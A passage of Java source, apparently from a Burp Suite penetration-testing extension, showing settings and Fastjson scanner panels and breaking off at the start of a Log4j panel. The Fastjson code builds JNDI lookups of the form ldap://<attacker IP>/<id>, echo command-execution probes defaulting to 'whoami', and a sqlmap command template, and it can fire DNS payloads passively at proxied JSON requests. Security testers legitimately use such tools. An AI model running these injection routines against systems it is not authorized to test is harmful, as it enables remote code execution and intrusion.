GridConstraints.SIZEPOLICY_FIXED,\n null, null, null, 0, false));\n\n toolArgvTextField = new JTextField();\n configPanelTop.add(toolArgvTextField, new GridConstraints(3, 3, 1, 1,\n GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,\n GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED,\n null, new Dimension(250, -1), null, 0, false));\n\n toolButton = new JButton();\n toolButton.setText(I18nUtils.get(\"config.button.save\"));\n configPanelTop.add(toolButton, new GridConstraints(3, 4, 1, 1,\n GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_HORIZONTAL,\n GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,\n GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false));\n\n // 按钮行\n JPanel buttonPanel = new JPanel();\n buttonPanel.setLayout(new FlowLayout(FlowLayout.LEFT, 10, 5)); // 使用FlowLayout,左对齐,间距10\n configPanelTop.add(buttonPanel, new GridConstraints(4, 0, 1, 9,\n GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,\n GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,\n GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false));\n\n refershButton = new JButton();\n refershButton.setText(I18nUtils.get(\"config.button.refresh\"));\n buttonPanel.add(refershButton);\n\n deleteSelectButton = new JButton();\n deleteSelectButton.setText(I18nUtils.get(\"config.button.delete\"));\n buttonPanel.add(deleteSelectButton);\n\n clearCacheButton = new JButton();\n clearCacheButton.setText(I18nUtils.get(\"config.button.clear_cache\"));\n buttonPanel.add(clearCacheButton);\n\n // 新增按钮\n resetUrl = new JButton(I18nUtils.get(\"config.button.reset\"));\n buttonPanel.add(resetUrl);\n\n // 配置下部面板(表格)\n configPanelDown = new JPanel();\n configPanelDown.setLayout(new GridLayoutManager(1, 1, new Insets(10, 10, 10, 10), -1, -1));\n configPanel.add(configPanelDown, BorderLayout.CENTER);\n\n configPanelDownJscrollPanel = new JScrollPane();\n configPanelDown.add(configPanelDownJscrollPanel, new GridConstraints(0, 0, 1, 1,\n GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_BOTH,\n GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_WANT_GROW,\n GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_WANT_GROW,\n null, null, null, 0, false));\n\n configTable = new JTable(dataModel);\n configTable.setRowHeight(25); // 设置表格行高\n configTable.setFillsViewportHeight(true); // 表格填充视窗\n configPanelDownJscrollPanel.setViewportView(configTable);\n }\n\n private void setupData() {\n ConfigBean dnsconfig = getConfig(\"config\", \"dnslog\");\n dnslogTextField.setText(dnsconfig.getValue());\n\n ConfigBean ipconfig = getConfig(\"config\", \"ip\");\n ipTextField.setText(ipconfig.getValue());\n\n toolNameTextField.setText(\"sqlmap\");\n toolArgvTextField.setText(\"python sqlmap.py -r {request} -u {url} -h {host}\");\n\n List toolParam = getToolConfig();\n for (ConfigBean config : toolParam) {\n addData(config.getType(), config.getValue());\n }\n\n refershButton.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n List toolParam = getToolConfig();\n data.clear();\n for (ConfigBean config : toolParam) {\n addData(config.getType(), config.getValue());\n }\n dataModel.fireTableDataChanged();\n }\n });\n\n deleteSelectButton.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n\n int[] selectedRows = configTable.getSelectedRows();\n for (int i = selectedRows.length - 1; i >= 0; i--) {\n int selectedRow = selectedRows[i];\n String type = (String) configTable.getValueAt(selectedRow, 1);\n deleteToolConfig(type);\n data.remove(selectedRow);\n dataModel.fireTableRowsDeleted(selectedRow, selectedRow);\n dataModel.fireTableDataChanged();\n }\n }\n });\n clearCacheButton.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n // mark\n // 弹出提示框\n boolean deleteReqFile = Utils.deleteReqFile();\n if (deleteReqFile){\n JOptionPane.showMessageDialog(null, I18nUtils.get(\"config.message.delete_success\"), I18nUtils.get(\"config.title.info\"), JOptionPane.INFORMATION_MESSAGE);\n }else {\n JOptionPane.showMessageDialog(null, I18nUtils.get(\"config.message.delete_failed\"), I18nUtils.get(\"config.title.info\"), JOptionPane.INFORMATION_MESSAGE);\n }\n }\n });\n\n dnslogButton.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n String module = \"config\";\n String dns = dnslogTextField.getText();\n ConfigBean config = new ConfigBean(module, \"dnslog\", dns);\n saveConfig(config);\n FastjsonUI.dnslog = dns;\n Log4jUI.dns = dns;\n // 弹窗提示\n JOptionPane.showMessageDialog(null, I18nUtils.get(\"config.message.save_success\"), I18nUtils.get(\"config.title.info\"), JOptionPane.INFORMATION_MESSAGE);\n }\n });\n\n ipButton.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n String module = \"config\";\n String ip = ipTextField.getText();\n ConfigBean config = new ConfigBean(module, \"ip\", ip);\n saveConfig(config);\n FastjsonUI.ip = ip;\n Log4jUI.ip = ip;\n JOptionPane.showMessageDialog(null, I18nUtils.get(\"config.message.save_success\"), I18nUtils.get(\"config.title.info\"), JOptionPane.INFORMATION_MESSAGE);\n }\n });\n\n toolButton.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n String module = \"tool\";\n String type = toolNameTextField.getText();\n String value = toolArgvTextField.getText();\n ConfigBean config = new ConfigBean(module, type, value);\n saveConfig(config);\n addData(type, value);\n JOptionPane.showMessageDialog(null, I18nUtils.get(\"config.message.save_success\"), I18nUtils.get(\"config.title.info\"), JOptionPane.INFORMATION_MESSAGE);\n }\n });\n resetUrl.addActionListener(new ActionListener() {\n @Override\n public void actionPerformed(ActionEvent e) {\n UrlCacheUtil.resetAllCaches();\n RouteUI.resetAllCaches();\n PermUI.resetAllCaches();\n Log4jUI.resetAllCaches();\n FastjsonUI.resetAllCaches();\n SqlUI.resetAllCaches();\n JOptionPane.showMessageDialog(null, I18nUtils.get(\"config.message.reset_success\"), I18nUtils.get(\"config.title.info\"), JOptionPane.INFORMATION_MESSAGE);\n }\n });\n\n // 语言选择监听器\n languageComboBox.addActionListener(new ActionListener() {\n @Override\n public void actionPerformed(ActionEvent e) {\n String selectedLanguage = (String) languageComboBox.getSelectedItem();\n boolean isChinese = selectedLanguage.equals(\"中文\");\n I18nUtils.setChinese(isChinese);\n \n // 保存语言设置到配置\n String module = \"config\";\n String key = \"language\";\n String value = isChinese ? \"zh\" : \"en\";\n ConfigBean config = new ConfigBean(module, key, value);\n saveConfig(config);\n \n // 提示用户重启插件以应用语言更改\n JOptionPane.showMessageDialog(null, I18nUtils.get(\"common.message.language_change\"), I18nUtils.get(\"common.title.info\"), JOptionPane.INFORMATION_MESSAGE);\n }\n });\n\n }\n\n // 添加数据\n public void addData(String key, String value) {\n synchronized (data) {\n data.add(new LogEntry(data.size() + 1, key, value));\n dataModel.fireTableDataChanged();\n dataModel.fireTableRowsInserted(data.size() - 1, data.size() - 1);\n }\n }\n\n @Override\n public void init() {\n setupUI();\n setupData();\n }\n\n @Override\n public JPanel getPanel(IBurpExtenderCallbacks callbacks) {\n return panel;\n }\n\n @Override\n public String getTabName() {\n return \"Setting\";\n }\n\n // 表格模型\n static class ConfigModel extends AbstractTableModel {\n\n @Override\n public int getRowCount() {\n return data.size();\n }\n\n @Override\n public int getColumnCount() {\n return 3;\n }\n\n @Override\n public Object getValueAt(int rowIndex, int columnIndex) {\n LogEntry dataEntry = data.get(rowIndex);\n switch (columnIndex) {\n case 0:\n return dataEntry.id;\n case 1:\n return dataEntry.key;\n case 2:\n return dataEntry.value;\n default:\n return null;\n }\n }\n\n @Override\n public String getColumnName(int column) {\n switch (column) {\n case 0:\n return \"id\";\n case 1:\n return \"key\";\n case 2:\n return \"value\";\n default:\n return null;\n }\n }\n }\n\n // 表格实体类\n public static class LogEntry {\n private final String key;\n private final String value;\n private int id;\n\n public LogEntry(int id, String key, String value) {\n this.id = id;\n this.key = key;\n this.value = value;\n }\n\n public LogEntry(String key, String value) {\n this.key = key;\n this.value = value;\n }\n }\n}\n"
},
{
"path": "src/main/java/burp/ui/FastjsonUI.java",
"content": "package burp.ui;\n\nimport burp.*;\nimport burp.bean.FastjsonBean;\nimport burp.utils.CustomScanIssue;\nimport burp.utils.I18nUtils;\nimport burp.utils.JsonUtils;\nimport burp.utils.UrlCacheUtil;\nimport burp.utils.Utils;\n\nimport javax.swing.*;\nimport javax.swing.table.AbstractTableModel;\nimport javax.swing.table.DefaultTableCellRenderer;\nimport javax.swing.table.TableColumnModel;\nimport javax.swing.table.TableModel;\nimport java.awt.*;\nimport java.awt.event.ActionEvent;\nimport java.net.MalformedURLException;\nimport java.net.URL;\nimport java.util.ArrayList;\nimport java.util.Iterator;\nimport java.util.List;\nimport java.util.Objects;\nimport java.util.concurrent.locks.Lock;\nimport java.util.concurrent.locks.ReentrantLock;\n\nimport static burp.dao.ConfigDao.getConfig;\nimport static burp.dao.FastjsonDao.getFastjsonListsByType;\n\n/**\n * @Author Xm17\n * @Date 2024-06-22 12:13\n */\npublic class FastjsonUI implements UIHandler, IMessageEditorController , IHttpListener{\n private JPanel panel; // 主面板\n private JTabbedPane fastjsonreq; // 请求面板\n private JTabbedPane fastjsonresp; // 响应面板\n private JButton btnClear; // 清空按钮\n private JButton btnRefresh; // 添加刷新按钮\n private static volatile boolean autoRefresh = true; // 控制是否自动刷新\n private static final Object refreshLock = new Object();\n private JCheckBox autoRefreshCheckBox; // 自动刷新开关\n private static JTable fastjsonTable; // fastjson表格\n private IHttpRequestResponse currentlyDisplayedItem; // 当前显示的请求\n private JCheckBox passiveScanCheckBox; // 添加被动扫描复选框\n private IMessageEditor HRequestTextEditor; // 请求编辑器\n private IMessageEditor HResponseTextEditor; // 响应编辑器\n private static final List fastjsonlog = new ArrayList<>(); // fastjson日志\n public static String dnslog; // dnslog地址\n public static String ip; // ip地址\n private static List jndiPayloads = new ArrayList<>(); // jndi payloads\n private static List versionPayloads = new ArrayList<>(); // jndi payloads\n private static List dnsPayloads = new ArrayList<>(); // jndi payloads\n private static List echoPayloads = new ArrayList<>(); // jndi payloads\n private static final Lock lock = new ReentrantLock();\n private boolean isPassiveScanEnabled = false; // 控制被动扫描状态\n \n public static void resetAllCaches() {\n UrlCacheUtil.resetCache(\"fastjson\");\n }\n\n @Override\n public IHttpService getHttpService() {\n return currentlyDisplayedItem.getHttpService();\n }\n\n @Override\n public byte[] getRequest() {\n return currentlyDisplayedItem.getRequest();\n }\n\n @Override\n public byte[] getResponse() {\n return currentlyDisplayedItem.getResponse();\n }\n\n @Override\n public void init() {\n\n dnslog = getConfig(\"config\", \"dnslog\").getValue();\n ip = getConfig(\"config\", \"ip\").getValue();\n jndiPayloads = getFastjsonListsByType(\"jndi\");\n versionPayloads = getFastjsonListsByType(\"version\");\n dnsPayloads = getFastjsonListsByType(\"dns\");\n echoPayloads = getFastjsonListsByType(\"echo\");\n setupUI();\n setupData();\n // 注册HTTP监听器\n Utils.callbacks.registerHttpListener(this);\n }\n\n // 初始化数据\n private void setupData() {\n // 清空按钮事件\n btnClear.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n fastjsonlog.clear();\n UrlCacheUtil.resetCache(\"fastjson\"); // 清空URL缓存\n HRequestTextEditor.setMessage(new byte[0], true);\n HResponseTextEditor.setMessage(new byte[0], false);\n refreshTable();\n }\n });\n\n // 刷新按钮事件\n btnRefresh.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n refreshTable();\n }\n });\n\n // 自动刷新开关事件\n autoRefreshCheckBox.addActionListener(e -> {\n setAutoRefresh(autoRefreshCheckBox.isSelected());\n if(autoRefreshCheckBox.isSelected()) {\n refreshTable(); // 当开启自动刷新时,立即进行一次刷新\n }\n });\n // 添加被动扫描复选框事件监听\n passiveScanCheckBox.addActionListener(e -> {\n isPassiveScanEnabled = passiveScanCheckBox.isSelected();\n });\n }\n\n // 刷新表格方法\n private static void refreshTable() {\n SwingUtilities.invokeLater(() -> {\n if(fastjsonTable != null) {\n ((AbstractTableModel)fastjsonTable.getModel()).fireTableDataChanged();\n }\n });\n }\n\n // 初始化UI\n private void setupUI() {\n panel = new JPanel();\n panel.setLayout(new BorderLayout());\n // 顶部面板添加清空按钮和被动扫描复选框\n JPanel topPanel = new JPanel(new FlowLayout(FlowLayout.LEFT));\n btnClear = new JButton(I18nUtils.get(\"fastjson.button.clear\"));\n passiveScanCheckBox = new JCheckBox(I18nUtils.get(\"fastjson.checkbox.passive_scan\"));\n btnRefresh = new JButton(I18nUtils.get(\"fastjson.button.refresh\"));\n autoRefreshCheckBox = new JCheckBox(I18nUtils.get(\"fastjson.checkbox.auto_refresh\"));\n autoRefreshCheckBox.setSelected(true); // 默认开启自动刷新\n topPanel.add(btnClear);\n topPanel.add(btnRefresh);\n topPanel.add(autoRefreshCheckBox);\n topPanel.add(passiveScanCheckBox);\n panel.add(topPanel, BorderLayout.NORTH);\n\n // 上下分割面板,比例是7:3\n JSplitPane mainsplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);\n mainsplitPane.setResizeWeight(0.7);\n mainsplitPane.setDividerLocation(0.7);\n\n // 添加URLTable到mainsplitPane的上边\n fastjsonTable = new URLTable(new FastjsonModel());\n JScrollPane scrollPane = new JScrollPane(fastjsonTable);\n mainsplitPane.setTopComponent(scrollPane);\n\n // 创建一个自定义的单元格渲染器\n DefaultTableCellRenderer renderer = new DefaultTableCellRenderer() {\n @Override\n public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) {\n JLabel label = (JLabel) super.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column);\n label.setHorizontalAlignment(JLabel.CENTER);\n label.setHorizontalTextPosition(JLabel.CENTER);\n label.setIconTextGap(0);\n label.setMaximumSize(new Dimension(Integer.MAX_VALUE, label.getPreferredSize().height));\n label.setToolTipText((String) value); // 设置鼠标悬停时显示的提示文本\n return label;\n }\n };\n\n fastjsonTable.getColumnModel().getColumn(5).setCellRenderer(renderer);\n\n // 左右分割面板,对称分割\n JSplitPane splitPaneDown = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT);\n splitPaneDown.setResizeWeight(0.5);\n splitPaneDown.setDividerLocation(0.5);\n // 添加请求响应到左右分割面板\n fastjsonreq = new JTabbedPane();\n HRequestTextEditor = Utils.callbacks.createMessageEditor(FastjsonUI.this, true);\n fastjsonreq.addTab(\"Request\", HRequestTextEditor.getComponent());\n\n fastjsonresp = new JTabbedPane();\n HResponseTextEditor = Utils.callbacks.createMessageEditor(FastjsonUI.this, false);\n fastjsonresp.addTab(\"Response\", HResponseTextEditor.getComponent());\n splitPaneDown.setLeftComponent(fastjsonreq);\n splitPaneDown.setRightComponent(fastjsonresp);\n\n // 添加splitPaneDown到mainsplitPane的下边\n mainsplitPane.setBottomComponent(splitPaneDown);\n\n panel.add(mainsplitPane, BorderLayout.CENTER);\n\n }\n\n @Override\n public JPanel getPanel(IBurpExtenderCallbacks callbacks) {\n return panel;\n }\n\n @Override\n public String getTabName() {\n return \"Fastjson\";\n }\n // dnslog检测\n public void CheckDnslog(IHttpRequestResponse[] responses) {\n lock.lock();\n try{\n IHttpRequestResponse baseRequestResponse = responses[0];\n IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);\n String extensionMethod = analyzeRequest.getMethod();\n URL dnsurl = analyzeRequest.getUrl();\n String url = analyzeRequest.getUrl().toString();\n List headers = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();\n String res = \"dnslog检测,请查看dnslog服务器\";\n IHttpService iHttpService = baseRequestResponse.getHttpService();\n for (FastjsonBean fastjson : dnsPayloads) {\n String fastjsonDnslog = fastjson.getValue();\n String dnslogPayload = Utils.generateDnsPayload(dnsurl, dnslog);\n String fuzzPayload = fastjsonDnslog.replace(\"FUZZ\", dnslogPayload);\n String jsonPayload = JsonUtils.encodeToJsonRandom(fuzzPayload);\n byte[] bytePayload = Utils.helpers.stringToBytes(jsonPayload);\n byte[] postMessage = Utils.helpers.buildHttpMessage(headers, bytePayload); // 目前只支持post\n IHttpRequestResponse resp = Utils.callbacks.makeHttpRequest(iHttpService, postMessage);\n IResponseInfo iResponseInfo = Utils.callbacks.getHelpers().analyzeResponse(resp.getResponse());\n String statusCode = String.valueOf(iResponseInfo.getStatusCode());\n add(extensionMethod, url, statusCode, res, fuzzPayload,resp);\n }\n }finally {\n lock.unlock();\n }\n\n }\n\n // echo命令检测\n public void CheckEchoVul(IHttpRequestResponse[] responses) {\n lock.lock();\n try{\n IHttpRequestResponse baseRequestResponse = responses[0];\n IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);\n String extensionMethod = analyzeRequest.getMethod();\n String url = analyzeRequest.getUrl().toString();\n List headers = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();\n // 弹出一个输入框,用于获取用户输入的dnslog地址\n String defaultValue = \"whoami\";\n String echoVul = (String) JOptionPane.showInputDialog(null, I18nUtils.get(\"fastjson.message.enter_echo\"), I18nUtils.get(\"config.title.info\"), JOptionPane.PLAIN_MESSAGE, null, null, defaultValue);\n if (echoVul == null){\n JOptionPane.showMessageDialog(null, I18nUtils.get(\"fastjson.message.enter_echo\"), I18nUtils.get(\"config.title.info\"), JOptionPane.ERROR_MESSAGE);\n return;\n }\n IHttpService iHttpService = baseRequestResponse.getHttpService();\n Iterator iterator = echoPayloads.iterator();\n headers.add(\"Accept-Cache: \" + echoVul);\n while (iterator.hasNext()) {\n FastjsonBean fastjson = iterator.next();\n String fastjsonEcho = fastjson.getValue();\n byte[] bytePayload = Utils.helpers.stringToBytes(fastjsonEcho);\n byte[] postMessage = Utils.helpers.buildHttpMessage(headers, bytePayload); // 目前只支持post\n IHttpRequestResponse resp = Utils.callbacks.makeHttpRequest(iHttpService, postMessage);\n IResponseInfo iResponseInfo = Utils.callbacks.getHelpers().analyzeResponse(resp.getResponse());\n String statusCode = String.valueOf(iResponseInfo.getStatusCode());\n List headersResp = iResponseInfo.getHeaders();\n boolean containsContentAuth = false;\n for (String header : headersResp) {\n if (header.contains(\"Content-auth\")) {\n containsContentAuth = true;\n break;\n }\n }\n if (containsContentAuth) {\n add(extensionMethod, url, statusCode, \"echo命令检测完成,发现结果\",fastjsonEcho, resp);\n IScanIssue issues = null;\n try {\n issues = new CustomScanIssue(iHttpService, new URL(url), new IHttpRequestResponse[]{resp},\n \"Fastjson echo\", \"Fastjson echo命令检测完成,发现结果\",\n \"High\", \"Certain\");\n Utils.callbacks.addScanIssue(issues);\n } catch (MalformedURLException e) {\n throw new RuntimeException(e);\n }\n } else {\n add(extensionMethod, url, statusCode, \"echo命令检测完成,未发现结果\",fastjsonEcho, resp);\n }\n }\n }finally {\n lock.unlock();\n }\n }\n // jndi检测\n public void CheckJNDIVul(IHttpRequestResponse[] responses) {\n lock.lock();\n try {\n IHttpRequestResponse baseRequestResponse = responses[0];\n IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);\n String extensionMethod = analyzeRequest.getMethod();\n String url = analyzeRequest.getUrl().toString();\n List headers = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();\n try {\n\n String jndiStr = \"\";\n String defaultValue = \"IP\"; // 设置默认值\n String[] options = {\"DNS\", \"IP\"}; // 单选框选项\n String selectedValue = (String) JOptionPane.showInputDialog(null, I18nUtils.get(\"fastjson.dialog.select_type\"), I18nUtils.get(\"fastjson.dialog.tip\"),\n JOptionPane.PLAIN_MESSAGE, null, options, defaultValue);\n if (Objects.equals(selectedValue, \"DNS\")) {\n jndiStr = dnslog;\n }\n if (Objects.equals(selectedValue, \"IP\")) {\n jndiStr = ip;\n }\n\n IHttpService iHttpService = baseRequestResponse.getHttpService();\n for (FastjsonBean payload : jndiPayloads) {\n String dnslogKey = \"\";\n\n String fastjsonJNDI = payload.getValue();\n String id = String.valueOf(payload.getId());\n if (selectedValue.equals(\"DNS\")) {\n dnslogKey = \"ldap://\" + id + \".\" + jndiStr;\n } else {\n dnslogKey = \"ldap://\" + jndiStr + \"/\" + id;\n }\n String fuzzPayload = fastjsonJNDI.replace(\"FUZZ\", dnslogKey);\n String jsonPayload = JsonUtils.encodeToJsonRandom(fuzzPayload);\n byte[] bytePayload = Utils.helpers.stringToBytes(jsonPayload);\n byte[] postMessage = Utils.helpers.buildHttpMessage(headers, bytePayload); // 目前只支持post\n IHttpRequestResponse resp = Utils.callbacks.makeHttpRequest(iHttpService, postMessage);\n IResponseInfo iResponseInfo = Utils.callbacks.getHelpers().analyzeResponse(resp.getResponse());\n String statusCode = String.valueOf(iResponseInfo.getStatusCode());\n add(extensionMethod, url, statusCode, \"jndi检测完成,请查看服务器\",fuzzPayload, resp);\n }\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n }\n }finally {\n lock.unlock();\n }\n }\n // version检测\n public void CheckVersion(IHttpRequestResponse[] responses) {\n lock.lock();\n try{\n IHttpRequestResponse baseRequestResponse = responses[0];\n IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);\n String extensionMethod = analyzeRequest.getMethod();\n String url = analyzeRequest.getUrl().toString();\n List headers = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();\n IHttpService iHttpService = baseRequestResponse.getHttpService();\n for (FastjsonBean fastjson : versionPayloads) {\n String fastjsonVersion = fastjson.getValue();\n byte[] bytePayload = Utils.helpers.stringToBytes(fastjsonVersion);\n byte[] postMessage = Utils.helpers.buildHttpMessage(headers, bytePayload); // 目前只支持post\n IHttpRequestResponse resp = Utils.callbacks.makeHttpRequest(iHttpService, postMessage);\n IResponseInfo iResponseInfo = Utils.callbacks.getHelpers().analyzeResponse(resp.getResponse());\n String statusCode = String.valueOf(iResponseInfo.getStatusCode());\n add(extensionMethod, url, statusCode, \"version检测完成,请查看返回包\",fastjsonVersion, resp);\n }\n }finally {\n lock.unlock();\n }\n }\n // 添加日志\n private static void add(String extensionMethod, String url, String status, String res,String req, IHttpRequestResponse baseRequestResponse) {\n synchronized (fastjsonlog) {\n int id = fastjsonlog.size();\n fastjsonlog.add(new FastjsonEntry(id, extensionMethod, url, status, res,req, baseRequestResponse));\n // 只保留refreshTable即可,删除updateUI\n if(autoRefresh) {\n refreshTable();\n }\n }\n }\n public static void setAutoRefresh(boolean value) {\n synchronized (refreshLock) {\n autoRefresh = value;\n }\n }\n\n @Override\n public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo) {\n // 只处理被动扫描启用、响应包、且来自代理或Spider的请求\n if (!isPassiveScanEnabled || messageIsRequest ||\n (toolFlag != IBurpExtenderCallbacks.TOOL_PROXY &&\n toolFlag != IBurpExtenderCallbacks.TOOL_SPIDER)) {\n return;\n }\n\n IRequestInfo requestInfo = Utils.helpers.analyzeRequest(messageInfo);\n URL infoUrl = requestInfo.getUrl();\n String url = requestInfo.getUrl().toString();\n String method = requestInfo.getMethod();\n List headers = requestInfo.getHeaders();\n\n // 检查是否为静态资源\n if (Utils.isUrlBlackListSuffix(url)) {\n return;\n }\n\n // 检查是否重复\n if (!UrlCacheUtil.checkUrlUnique(\"fastjson\", method, infoUrl, new ArrayList<>())) {\n return;\n }\n\n // 检查是否为POST请求且Content-Type为JSON\n if (!\"POST\".equalsIgnoreCase(method)) {\n return;\n }\n\n boolean isJson = false;\n for (String header : headers) {\n if (header.toLowerCase().contains(\"content-type\") &&\n header.toLowerCase().contains(\"application/json\")) {\n isJson = true;\n break;\n }\n }\n\n if (!isJson) {\n return;\n }\n\n // 进行Fastjson被动扫描测试\n performPassiveScan(messageInfo);\n }\n\n // 执行被动扫描测试\n private void performPassiveScan(IHttpRequestResponse baseRequestResponse) {\n try {\n IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);\n String url = analyzeRequest.getUrl().toString();\n String method = analyzeRequest.getMethod();\n List headers = analyzeRequest.getHeaders();\n IHttpService httpService = baseRequestResponse.getHttpService();\n URL dnsurl = analyzeRequest.getUrl();\n // 使用dnslog payload进行测试\n for (FastjsonBean fastjson : dnsPayloads) {\n String fastjsonDnslog = fastjson.getValue();\n String dnslogPayload = Utils.generateDnsPayload(dnsurl, dnslog);\n String fuzzPayload = fastjsonDnslog.replace(\"FUZZ\", dnslogPayload);\n String jsonPayload = JsonUtils.encodeToJsonRandom(fuzzPayload);\n byte[] bytePayload = Utils.helpers.stringToBytes(jsonPayload);\n byte[] postMessage = Utils.helpers.buildHttpMessage(headers, bytePayload);\n\n IHttpRequestResponse resp = Utils.callbacks.makeHttpRequest(httpService, postMessage);\n IResponseInfo responseInfo = Utils.helpers.analyzeResponse(resp.getResponse());\n String statusCode = String.valueOf(responseInfo.getStatusCode());\n\n // 记录扫描结果\n add(method, url, statusCode, \"被动扫描DNS检测\", fuzzPayload, resp);\n }\n } catch (Exception e) {\n Utils.stderr.println(\"Passive scan error: \" + e.getMessage());\n }\n }\n\n private static class FastjsonModel extends AbstractTableModel {\n\n @Override\n public int getRowCount() {\n synchronized (fastjsonlog) {\n return fastjsonlog.size();\n }\n }\n\n @Override\n public int getColumnCount() {\n return 6;\n }\n\n @Override\n public Object getValueAt(int rowIndex, int columnIndex) {\n synchronized (fastjsonlog) {\n if (rowIndex >= 0 && rowIndex < fastjsonlog.size()) {\n FastjsonEntry logEntry = fastjsonlog.get(rowIndex);\n switch (columnIndex) {\n case 0: return logEntry.id;\n case 1: return logEntry.extensionMethod;\n case 2: return logEntry.url;\n case 3: return logEntry.status;\n case 4: return logEntry.res;\n case 5: return logEntry.req;\n default: return \"\";\n }\n }\n return \"\";\n }\n }\n\n @Override\n public String getColumnName(int column) {\n switch (column) {\n case 0:\n return \"id\";\n case 1:\n return \"method\";\n case 2:\n return \"url\";\n case 3:\n return \"status\";\n case 4:\n return \"res\";\n case 5:\n return \"req\";\n default:\n return \"\";\n }\n\n }\n\n }\n\n private static class FastjsonEntry {\n final int id;\n final String extensionMethod;\n final String url;\n final String status;\n final String res;\n final String req;\n\n final IHttpRequestResponse requestResponse;\n\n\n private FastjsonEntry(int id, String extensionMethod, String url, String status, String res,String req, IHttpRequestResponse requestResponse) {\n this.id = id;\n this.extensionMethod = extensionMethod;\n this.url = url;\n this.status = status;\n this.res = res;\n this.req = req;\n this.requestResponse = requestResponse;\n }\n }\n\n private class URLTable extends JTable {\n public URLTable(TableModel tableModel) {\n super(tableModel);\n TableColumnModel columnModel = getColumnModel();\n columnModel.getColumn(0).setMaxWidth(50);\n columnModel.getColumn(5).setMaxWidth(250);\n }\n\n @Override\n public void changeSelection(int row, int col, boolean toggle, boolean extend) {\n FastjsonEntry logEntry = fastjsonlog.get(row);\n HRequestTextEditor.setMessage(logEntry.requestResponse.getRequest(), true);\n if (logEntry.requestResponse.getResponse() == null) {\n HResponseTextEditor.setMessage(new byte[0], false);\n } else {\n HResponseTextEditor.setMessage(logEntry.requestResponse.getResponse(), false);\n }\n currentlyDisplayedItem = logEntry.requestResponse;\n super.changeSelection(row, col, toggle, extend);\n }\n }\n}\n"
},
{
"path": "src/main/java/burp/ui/Log4jUI.java",
"content": "package burp.ui;\n\nimport burp.*;\nimport burp.bean.Log4jBean;\nimport burp.ui.UIHepler.GridBagConstraintsHelper;\nimport burp.utils.I18nUtils;\nimport burp.utils.JsonUtils;\nimport burp.utils.Utils;\nimport burp.utils.UrlCacheUtil;\nimport com.alibaba.fastjson.JSON;\n\nimport javax.swing.*;\nimport javax.swing.table.AbstractTableModel;\nimport javax.swing.table.TableColumnModel;\nimport javax.swing.table.TableModel;\nimport java.awt.*;\nimport java.awt.event.ActionEvent;\nimport java.net.URL;\nimport java.util.List;\nimport java.util.*;\nimport java.util.concurrent.locks.Lock;\nimport java.util.concurrent.locks.ReentrantLock;\n\nimport static burp.IParameter.*;\nimport static burp.dao.ConfigDao.getConfig;\nimport static burp.dao.Log4jDao.*;\n\n/**\n * @Author Xm17\n * @Date 2024-06-22 12:45\n */\npublic class Log4jUI implements UIHandler, IMessageEditorController, IHttpListener {\n private JPanel panel; // 主面板\n private static JTable log4jtable; // log4j表格\n private JCheckBox passiveScanCheckBox; // 被动扫描选择框\n private JCheckBox originalValueCheckBox; // 原始payload值选择框\n private JCheckBox checkHeaderCheckBox; // 检测header选择框\n private JCheckBox isDnsOrIpCheckBox; // 是否是dns或者ip选择框\n private JCheckBox checkWhiteListCheckBox; // 白名单域名检测选择框\n private JCheckBox checkParmamCheckBox; // 检测参数选择框\n private JButton saveWhiteListButton; // 保存白名单域名按钮\n private JButton saveHeaderListButton; // 保存header按钮\n private JButton savePayloadButton; // 保存log4j payload按钮\n private JButton refreshTableButton; // 刷新表格按钮\n private JButton clearTableButton;// 清空表格按钮\n private JTextArea whiteListTextArea; // 白名单域名输入框\n private JTextArea headerTextArea; // header输入框\n private JTextArea payloadTextArea; // payload输入框\n private JTabbedPane tabbedPanereq; // 请求tab\n private JTabbedPane tabbedPaneresp; // 响应tab\n private JScrollPane urltablescrollpane; // url table scroll pane\n private IHttpRequestResponse currentlyDisplayedItem; // currently displayed item\n private IMessageEditor HRequestTextEditor; // request editor\n private IMessageEditor HResponseTextEditor; // response editor\n private static final List log4jlog = new ArrayList<>();\n private static final List parameterList = new ArrayList<>(); // 参数列表\n private static final List urlHashList = new ArrayList<>(); // url hash list\n private static boolean isPassiveScan; // 是否是被动扫描\n private static boolean isOriginalValue; // 是否删除原始值\n private static boolean 